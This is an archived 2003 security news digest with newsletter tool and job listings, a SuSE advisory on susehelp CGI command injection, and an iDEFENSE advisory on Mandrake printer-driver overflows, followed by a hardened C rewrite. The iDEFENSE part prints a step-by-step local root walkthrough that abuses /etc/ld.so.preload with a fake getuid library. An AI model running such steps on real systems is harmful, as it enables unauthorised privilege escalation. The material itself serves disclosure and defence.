http://online.securityfocus.com/news/2055
4. BBC in ironic virus infection
By John Leyden, The Register
The BBC fell victim to the latest variant of the ExploreZip worm, and a
certain amount of hubris, last week.
http://online.securityfocus.com/news/2052
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. ForceSQL v2.0
by Network Intelligence India Pvt. Ltd.
Relevant URL:
http://www.nii.co.in/tools.html
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
forceSQL is a password auditing tool for MS SQL Servers. It audits
accounts by guessing passwords on SQL Databases. It uses both brute-force
and dictionary attacks. It works much faster than other such tools because
it bypasses the SQL ODBC API and talks directly to the network layer by
constructing its own login packets.
2. SMAC v1.0
by KLC Consulting Security Team
Relevant URL:
http://www.klcconsulting.net/smac/
Platforms: Windows 2000, Windows XP
Summary:
SMAC is a free GUI tool that allows users to change the MAC address of
almost any Network Interface Card (NIC) on Windows 2000 and XP
systems, whether or not the manufacturer allows this option.
SMAC does not change the hardware burned-in MAC addresses. It is not
necessary. SMAC changes the "software based" MAC addresses on Windows
2000 & XP systems, and the new MAC addresses you set persist across
reboots.
3. Active@ File Recovery v2.0
by Active@ Data Recovery Services
Relevant URL:
http://www.file-recovery.net/
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Active@ File Recovery is a powerful software utility, designed to restore
accidentally deleted files and directories. It allows you to recover files
that have been deleted from the Recycle Bin, as well as those deleted
after avoiding the Recycle Bin (e.g. Shift-Delete).
4. NBTdeputy v1.0
by urity uri-@securityfriday.com
Relevant URL:
http://www.securityfriday.com/ToolDownload/NBTdeputy/nbtdeputy_doc.html
Platforms: Windows 2000
Summary:
NBTdeputy registers a NetBIOS computer name on the network and is ready to
respond to NetBT name-query requests. NBTdeputy helps to resolve an IP
address from a NetBIOS computer name. It's similar to Proxy ARP.
5. APD v1
by teknop
Relevant URL:
http://apd.sourceforge.net/
Platforms: POSIX
Summary:
APD is a promiscuous node detection tool which uses ARP packets to
determine whether or not a host is in promiscuous mode. This project is
based on the work of securityfriday.
6. mysql_auth v0.5
by HEGEDUS, Ervin
Relevant URL:
http://people.fsn.hu/~airween/mysql_auth/
Platforms: UNIX
Summary:
mysql_auth is a basic authenticator for Squid Proxy. You can configure all
MySQL variables for your existing user/password database (dbhost, dbadmin,
dbpasswd, dbname, tablename, columns name), or create a new database. It
includes a utility called mypasswd that updates your database.
V. SECURITY JOBS SUMMARY
------------------------
1. Senior Identity Manager - Cleveland, Ohio (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306912
2. Policy, Procedure, and Compliance Senior Manager - Cleveland, Ohio (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306914
3. Vulnerability Manager (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306920
4. Senior Enterprise Security Manager position in PA (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306906
5. Security Engineer (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306954
6. WANTED - Senior Sales Exec - New York (Tri-State Area) (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306743
7. Vice President of Business Development (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306739
8. Security System Engineer - Baltimore/Washington DC (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306775
9. Security Engineer -- San Diego (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306731
10. Senior Security Engineer - Baltimore/Washington DC (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306507
11. Seeking information security opportunity in - CA/ LA (CISSP) (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306492
12. Lead Business Development/Security Consultant(s) - UK (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306666
13. Seeking Information Security employment (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306443
14. Senior Federal Territory Manager (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306354
15. Information Security Analyst (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306353
16. IDS Signature Engineer needed now! (revised) (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306352
17. IDS Signature Engineer needed now! (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306173
18. Security Position with Bristol-Myers Squibb-Hopewell-NJ (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306308
19. Seeking internship or entry-level position (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306144
20. Looking for a security based role (no experience) (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306194
21. @stake Employment in Seattle (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306101
22. Looking for security job opportunity in Northern California/Central Valley. (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/306100
VI. INCIDENTS LIST SUMMARY
-------------------------
1. Hacked web server (Thread)
Relevant URL:
http://online.securityfocus.com/archive/75/306624
2. Virus? Trojan? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/75/306370
VII. VULN-DEV RESEARCH LIST SUMMARY
----------------------------------
1. NO NEW POSTS FOR THE WEEK ENDING 01.17.03
VIII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. AD replication over WAN (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/306896
2. SecurityFocus Microsoft Newsletter #120 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/306905
3. AD replication (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/306717
4. Understanding Event Details in Windows NT (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/306718
5. FW: AD replication over WAN (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/306762
IX. SUN FOCUS LIST SUMMARY
----------------------------
1. NO NEW POSTS FOR THE WEEK ENDING 01.17.03
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. How to build CD with chkrootkit on it? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/306728
XI. SPONSOR INFORMATION
-----------------------
This issue is sponsored by: Qualys
-------------------------------------------------------------------------------
_______________________________________________________________________________
END OF SF News
_______________________________________________________________________________
===============================================================================
SuSE Security Announcement
--------------------------
-----BEGIN PGP SIGNED MESSAGE-----
______________________________________________________________________________
SuSE Security Announcement
Package: susehelp
Announcement-ID: SuSE-SA:2003:005
Date: Mon Jan 20 14:00:00 CET 2003
Affected products: SuSE Linux 8.1,
SuSE Linux Enterprise Server 8,
SuSE Linux Office Server,
SuSE Linux Openexchange Server 4
Vulnerability Type: remote command execution
Severity (1-10): 5
SuSE default package: no
Cross References: -
Content of this advisory:
1) security vulnerability resolved: Remote command execution due
to broken filtering of shell metacharacters in CGI queries.
problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds: mod_php4
3) standard appendix (further information)
______________________________________________________________________________
1) problem description, brief discussion, solution, upgrade information
During a code review of the susehelp package the SuSE Security Team
recognized that the security checks done by the susehelp CGI scripts are
insufficient.
Remote attackers can insert certain characters in CGI queries to the
susehelp system tricking it into executing arbitrary code as the "wwwrun"
user. Please note that this is only a vulnerability if you have a web server
running and configured to allow access to the susehelp system by remote
sites.
We nevertheless recommend an update of this package. As a temporary
workaround you may un-install the susehelp package by issuing the following
command as root:
rpm -e --nodeps susehelp
Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command "rpm -Fhv file.rpm" to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.
SuSE-8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/noarch/susehelp-2002.09.05-51.noarch.rpm
6dde3d487385fd6a935643b1a0d92b86
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/noarch/susehelp-SLOD-2002.09.05-2.noarch.rpm
cd91f786f056518a11192b1ce9597783
______________________________________________________________________________
2) Pending vulnerabilities in SuSE Distributions and Workarounds:
- mod_php4
A buffer overflow in the wordwrap() function has been reported.
New packages will be prepared and should be available soon on our ftp
servers.
______________________________________________________________________________
3) standard appendix: authenticity verification, additional information
- Package authenticity verification:
SuSE update packages are available on many mirror ftp servers all over
the world. While this service is being considered valuable and important
to the free and open source software community, many users wish to be
sure about the origin of the package and its content before installing
the package. There are two verification methods that can be used
independently from each other to prove the authenticity of a downloaded
file or rpm package:
1) md5sums as provided in the (cryptographically signed) announcement.
2) using the internal gpg signatures of the rpm package.
1) execute the command
md5sum <name-of-the-file.rpm>
after you downloaded the file from a SuSE ftp server or its mirrors.
Then, compare the resulting md5sum with the one that is listed in the
announcement. Since the announcement containing the checksums is
cryptographically signed (usually using the key secu-@suse.de),
the checksums show proof of the authenticity of the package.
We recommend against subscribing to security lists which cause the
email message containing the announcement to be modified so that
the signature does not match after transport through the mailing
list software.
Downsides: You must be able to verify the authenticity of the
announcement in the first place. If RPM packages are being rebuilt
and a new version of a package is published on the ftp server, all
md5 sums for the files are useless.
2) rpm package signatures provide an easy way to verify the authenticity
of an rpm package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, where <file.rpm> is the
filename of the rpm package that you have downloaded. Of course,
package authenticity verification can only target an un-installed rpm
package file.
Prerequisites:
a) gpg is installed
b) The package is signed using a certain key. The public part of this
key must be installed by the gpg program in the directory
~/.gnupg/ under the user's home directory who performs the
signature verification (usually root). You can import the key
that is used by SuSE in rpm packages for SuSE Linux by saving
this announcement to a file ("announcement.txt") and
running the command (do "su -" to be root):
gpg --batch; gpg < announcement.txt | gpg --import
SuSE Linux distributions version 7.1 and thereafter install the
key "bui-@suse.de" upon installation or upgrade, provided that
the package gpg is installed. The file containing the public key
is placed at the top-level directory of the first CD (pubring.gpg)
and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .
- SuSE runs two security mailing lists to which any interested party may
subscribe:
suse-se-@suse.com
- general/linux/SuSE security discussion.
All SuSE security announcements are sent to this list.
To subscribe, send an email to
<suse-securit-@suse.com>.
suse-securi-@suse.com
- SuSE's announce-only mailing list.
Only SuSE's security announcements are sent to this list.
To subscribe, send an email to
<suse-security-an-@suse.com>.
For general information or the frequently asked questions (faq)
send mail to:
<suse-secu-@suse.com> or
<suse-secu-@suse.com> respectively.
=====================================================================
SuSE's security contact is <secu-@suse.com> or <secu-@suse.de>.
The <secu-@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular,
it is desired that the clear-text signature shows proof of the
authenticity of the text.
SuSE Linux AG makes no warranties of any kind whatsoever with respect
to the information contained in this security advisory.
Type Bits/KeyID Date User ID
pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <secu-@suse.de>
pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <bui-@suse.de>
--
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krah-@suse.de - SuSE Security Team
~
______________________________________________________________________________
END OF SuSE Security Announcement
______________________________________________________________________________
==============================================================================
iDEFENSE Security Advisory 01.21.03
-----------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iDEFENSE Security Advisory 01.21.03: Buffer Overflows in Mandrake Linux
printer-drivers Package
http://www.idefense.com/advisory/01.21.03.txt
January 21, 2003
I. BACKGROUND
MandrakeSoft Inc.'s Mandrake Linux includes the printer-drivers package in
most default installations. Specifically, the following three binaries are
included:
mtink: a status monitor that tracks remaining ink quantity, printing of
test patterns, and changing and cleaning cartridges, etc. It is maintained
by Jean-Jacques Sarton (jj.sa-@t-online.de).
escputil: a utility to clean and align the heads of Epson Stylus printers.
It also checks current ink levels in the printer. It is maintained by
Robert Krawitz (rl-@alum.mit.edu) and Mike Sweet.
ml85p: a Linux driver for Samsung ML-85G series printers. It is maintained
by Rildo Pragana (ril-@pragana.net).
II. DESCRIPTION
Three vulnerabilities exist, the worst of which allows local root
compromise of a target system.
VULNERABILITY ONE: The mtink binary, installed set group id (gid) 'sys',
contains a buffer overflow in its handling of the HOME environment
variable. Successful exploitation provides an attacker with 'sys' group
privileges. The following snippet contains the offending segment of code:
void readRc(int idx)
{
    FILE *fp;
    char rcPath[1024];
    ...
    sprintf(rcPath,"%s/.mtinkrc",getenv("HOME"));
VULNERABILITY TWO: The escputil binary, installed set gid 'sys', contains a
buffer overflow in its parsing of the printer-name command line argument.
Successful exploitation provides an attacker with 'sys' group privileges.
VULNERABILITY THREE: The ml85p binary, installed set user id root,
contains a race condition in its opening of temporary files. Successful
exploitation provides an attacker with the ability to create or empty a
file with super user privileges. The following snippet contains the
offending segment of code:
sprintf(gname,"/tmp/mlg85p%d",time(0));
if (!(cbmf = fopen(gname,"w+"))) {
An attacker can easily guess the name of a temporary file and then link
the guessed file to a file at another location. If the other file does not
exist, it is created world-writeable; if it does exist, the contents of
the file are lost. ml85p is, by default, installed without execute
permissions for 'other':
$ ls -l /usr/bin/ml85p
-rwsr-x--- 1 root sys 12344 Sep 17 12:40 /usr/bin/ml85p*
The binary, however, does provide execute permissions to the 'sys' group,
whose privileges can be gained using either of the two exploits in
VULNERABILITY ONE or TWO. Once 'sys' privileges are obtained, an attacker
can exploit this race condition.
The following example walks through a sample attack utilizing the
above-described methods:
$ id
uid=501(farmer) gid=501(farmer) groups=501(farmer)
$ ./escputil_ex
Usage : ./escputil_ex [offset]
Address : 0xbffff6b0
Exploiting...
Escputil version 4.2.2, Copyright (C) 2000-2001 Robert Krawitz
Escputil comes with ABSOLUTELY NO WARRANTY; for details type 'escputil -l'
This is free software, and you are welcome to redistribute it
under certain conditions; type 'escputil -l' for details.
Cleaning heads...
lpr: unable to print file: client-error-not-found
/etc/profile.d/alias.sh:31: parse error: condition expected: !=
$ id
uid=501(farmer) gid=501(farmer) egid=3(sys) groups=501(farmer)
$ ls -l /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory
$ ./ml85p_ex /etc/ld.so.preload
Press a key to clean/create /etc/ld.so.preload file
Wrong file format.
file position: ffffffff
$ ls -l /etc/ld.so.preload
-rw-rw-rw- 1 root sys 0 Oct 21 09:09 /etc/ld.so.preload
$ cat > /tmp/lib.c << EOF
heredoc> int getuid(void) { return 0; }
heredoc> EOF
$ gcc -fPIC -c /tmp/lib.c
$ gcc -o /tmp/lib.so -shared /tmp/lib.o
$ echo "/tmp/lib.so" > /etc/ld.so.preload
$ su -
# id
uid=0(root) gid=0(root) groups=0(root)
III. ANALYSIS
Any attacker with local access to a targeted system can launch this
attack. The ability to empty or create with root privileges any file on
the file system provides an attacker with many avenues of exploitation.
The above-described example is just one way of quickly gaining super user
privileges on a targeted system.
IV. DETECTION
Mandrake Linux 9.0 is vulnerable. By default, it includes the following
versions of the printer-drivers package:
printer-utils-1.0-76mdk
printer-filters-1.0-76mdk
V. VENDOR FIX / RESPONSE
MandrakeSoft has identified the problems and applied author-provided fixes
to the escputil and mtink vulnerabilities. A patch written by Till
Kamppeter was applied to ml85p to fix that vulnerability. Updates are
provided for Mandrake Linux 8.1 through 9.0 for the printer-drivers
packages, and ghostscript in 8.0 to fix these vulnerabilities
(MDKSA-2003:010).
VI. DISCLOSURE TIMELINE
10/06/2002 Issues disclosed to iDEFENSE
12/26/2002 Issues disclosed to jj.sa-@t-online.de,
rl-@alum.mit.edu, ril-@pragana.net, and
secu-@linux-mandrake.com
12/26/2002 Issues disclosed to iDEFENSE clients
12/26/2002 Vendor responses from rl-@alum.mit.edu,
jj.sa-@t-online.de
12/30/2002 Response from Vincent Danen (vda-@mandrakesoft.com)
01/21/2003 Coordinated public disclosure
VIII. CREDIT
Karol Wiesek (appe-@bsquad.sm.pl) discovered these vulnerabilities.
Get paid for security research
http://www.idefense.com/contributor.html
Subscribe to iDEFENSE Advisories:
send email to list-@idefense.com, subject line: "subscribe"
About iDEFENSE:
iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world, from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide
decision-makers, frontline security professionals and network
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com .
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xE4A96E4F
iQA/AwUBPi2Xuvrkky7kqW5PEQJ3hACgmjVD0byEeUAiFdrWtRnzbcuVe9IAoP4n
seYz8DLDxY5k9zWJhd6WoGJW
=WOHM
-----END PGP SIGNATURE-----
______________________________________________________________________________
END OF iDEFENSE Security Advisory 01.21.03: Buffer Overflows in Mandrake Linux
______________________________________________________________________________
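The two code defects quoted in the iDEFENSE advisory above (the unbounded sprintf() into rcPath in mtink, and the predictable /tmp/mlg85p<time> name opened with fopen() in ml85p), rewritten in a bounded and race-free form. This is an added example, not code from the advisory or from the upstream fixes; the function names and the /tmp/gnsec-demo-* directory are hypothetical.

```c
#define _XOPEN_SOURCE 700   /* mkstemp, mkdtemp, symlink, O_NOFOLLOW */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Bounded form of: sprintf(rcPath, "%s/.mtinkrc", getenv("HOME"));
 * Returns 0 on success, -1 if HOME is unset or empty or the path will not fit. */
int build_rc_path(char *out, size_t outsz, const char *home)
{
    if (outsz == 0 || home == NULL || home[0] == '\0')
        return -1;
    int n = snprintf(out, outsz, "%s/.mtinkrc", home);
    if (n > 0 && (size_t)n < outsz)
        return 0;
    out[0] = '\0';              /* would be truncated: reject, never use it */
    return -1;
}

/* Replaces: sprintf(gname, "/tmp/mlg85p%d", time(0)); fopen(gname, "w+");
 * mkstemp() picks an unpredictable name and creates it O_EXCL, mode 0600. */
FILE *open_scratch_file(char *tmpl)
{
    int fd = mkstemp(tmpl);
    FILE *fp = (fd < 0) ? NULL : fdopen(fd, "w+");
    if (fd >= 0 && fp == NULL) {
        close(fd);
        unlink(tmpl);
    }
    return fp;
}

/* Where a fixed name cannot be avoided: O_CREAT|O_EXCL fails if anything,
 * a symbolic link included, already exists at the path. */
int open_exclusive(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed check: a dangling symlink in a private directory must be
 * refused and its target left uncreated. Returns 1, 0, or -1 on setup error. */
int exclusive_open_refuses_symlink(void)
{
    char dir[] = "/tmp/gnsec-demo-XXXXXX", link_path[64], target[64];
    struct stat st;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(link_path, sizeof link_path, "%s/scratch", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    int planted = (symlink(target, link_path) == 0);
    int fd = planted ? open_exclusive(link_path) : -1;
    int refused = planted ? (fd < 0 && stat(target, &st) != 0) : -1;
    if (fd >= 0) close(fd);
    unlink(link_path);
    unlink(target);
    rmdir(dir);
    return refused;
}

int main(void)
{
    char rc[1024], tmpl[] = "/tmp/mlg85p-XXXXXX";
    printf("rc path ok: %d\n", build_rc_path(rc, sizeof rc, getenv("HOME")) == 0);
    FILE *fp = open_scratch_file(tmpl);
    if (fp) { printf("scratch file: %s\n", tmpl); fclose(fp); unlink(tmpl); }
    printf("symlink refused: %d\n", exclusive_open_refuses_symlink());
    return 0;
}
```

A set-id program should additionally decide whether it trusts HOME at all; the length check only removes the overflow, not the attacker's control over which path is opened.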
==============================================================================
************* End Of GN SecNews Vol 1 *************
==============================================================================
--
-vijay